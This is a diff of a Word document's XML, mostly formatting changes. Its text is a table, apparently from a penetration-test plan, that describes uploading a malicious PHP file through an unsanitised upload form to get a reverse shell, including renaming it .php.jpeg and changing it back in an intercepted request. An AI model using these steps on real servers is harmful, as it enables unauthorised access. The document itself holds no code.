-              <w:t xml:space="preserve">This is attack is to target insecure/unsanatised file uploads. A malicious file will be uploaded that will create a reverse shell on the host machine for the attacker to connect to </w:t>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>This is attack is to target insecure/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>unsanatised</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> file uploads. A malicious file will be uploaded that will create a reverse shell on the host machine for the attacker to connect to </w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3415,16 +3161,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3442,16 +3184,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3469,21 +3207,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1735" w:hRule="atLeast"/>
+          <w:trHeight w:val="1735"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3502,15 +3236,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="PreformattedText"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3528,47 +3259,34 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3587,16 +3305,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3614,16 +3328,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3641,21 +3351,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1837" w:hRule="atLeast"/>
+          <w:trHeight w:val="1837"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3674,75 +3380,88 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:i w:val="false"/>
-                <w:iCs w:val="false"/>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">If there is no sanitisation go to the php file and open it creating the reverse shell. </w:t>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">If there is no </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>sanitisation</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> go to the </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> file and open it creating the reverse shell. </w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3761,16 +3480,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3788,16 +3503,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3815,21 +3526,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1716" w:hRule="atLeast"/>
+          <w:trHeight w:val="1716"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3848,75 +3555,83 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:i w:val="false"/>
-                <w:iCs w:val="false"/>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>If there appears to some security e.g only allow images, change the file extension to .php.jpeg, intercept request and change back to .php</w:t>
-            </w:r>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">If there appears to some security </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>e.g</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> only allow images, change the file extension to .php.jpeg, intercept request and change back to .</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3935,16 +3650,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3962,16 +3673,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3989,21 +3696,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1718" w:hRule="atLeast"/>
+          <w:trHeight w:val="1718"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -4022,94 +3725,237 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:b w:val="false"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:kern w:val="0"/>
-                <w:highlight w:val="none"/>
-                <w:shd w:fill="auto" w:val="clear"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:kern w:val="0"/>
-                <w:shd w:fill="auto" w:val="clear"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Open the location the php file is saved to and connect to shell</w:t>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Open the location the </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> file is saved to and connect to shell</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
+    <w:p/>
     <w:sectPr>
-      <w:type w:val="nextPage"/>
+      <w:footerReference w:type="even" r:id="rId6"/>
+      <w:footerReference w:type="default" r:id="rId7"/>
       <w:pgSz w:w="11906" w:h="16838"/>
-      <w:pgMar w:left="1134" w:right="1134" w:gutter="0" w:header="0" w:top="1134" w:footer="0" w:bottom="1134"/>
-      <w:pgNumType w:fmt="decimal"/>
-      <w:formProt w:val="false"/>
-      <w:textDirection w:val="lrTb"/>
-      <w:docGrid w:type="default" w:linePitch="100" w:charSpace="0"/>
+      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="0" w:footer="0" w:gutter="0"/>
+      <w:cols w:space="720"/>
+      <w:formProt w:val="0"/>
+      <w:docGrid w:linePitch="100"/>
     </w:sectPr>
   </w:body>
 </w:document>
 </file>
 
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" 